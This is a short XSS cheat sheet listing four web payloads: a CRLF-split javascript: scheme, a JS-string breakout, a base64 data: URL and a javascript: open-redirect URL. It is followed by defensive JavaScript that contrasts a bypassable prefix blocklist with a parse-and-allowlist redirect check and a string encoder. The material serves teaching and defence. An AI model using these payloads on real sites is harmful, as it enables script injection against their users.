XSS TIPS
- Using CRLF (CR: \r, 0x0d; LF: \n, 0x0a)
java%0d%0ascript%0d%0a:alert(0)
- XSS from Open URL - If it’s in a JS variable
";alert(0);//
- XSS from data:// wrapper
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
- XSS from javascript:// wrapper
http://www.example.com/redirect.php?url=javascript:prompt(1)
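
Defensive counterpart to the tips above, as an added example that is not code from the original page: a redirect-target check that parses the `url` value and allowlists the scheme and host, next to a prefix blocklist that the CRLF variant gets past, plus an encoder for values placed in a JS string. The function names, the host allowlist and the sample inputs are assumptions made for illustration.

```javascript
// Hypothetical allowlist and base URL for the application doing the redirect.
const ALLOWED_HOSTS = new Set(["www.example.com"]);
const BASE = "http://www.example.com/";

// Weak check: prefix blocklist on the raw (already percent-decoded) value.
function naiveIsBlocked(value) {
  const v = value.toLowerCase();
  return v.startsWith("javascript:") || v.startsWith("data:");
}

// Stronger check: parse first, then allowlist scheme and host.
// The WHATWG URL parser removes tab, CR and LF from its input, as browsers do,
// so "java\r\nscript\r\n:" is recognised as the javascript: scheme.
function safeRedirectTarget(value) {
  let url;
  try {
    url = new URL(value, BASE); // relative targets resolve against BASE
  } catch {
    return null; // unparseable input is rejected
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return null;
  if (!ALLOWED_HOSTS.has(url.hostname)) return null;
  return url.href; // redirect to the normalised form, not the raw input
}

// Encode a value for use as a string literal inside an inline <script>.
// JSON.stringify escapes quotes and backslashes; the replacements stop the
// value from closing the script element or starting an HTML comment.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Constructed inputs: the value forms listed above, as a server sees them
// after percent-decoding the query string.
const crlfValue = decodeURIComponent("java%0d%0ascript%0d%0a:alert(0)");
console.log(naiveIsBlocked(crlfValue));                 // blocklist verdict
console.log(safeRedirectTarget(crlfValue));             // parsed verdict
console.log(safeRedirectTarget("javascript:prompt(1)"));
console.log(safeRedirectTarget("/account"));
console.log(jsStringLiteral('";alert(0);//'));
```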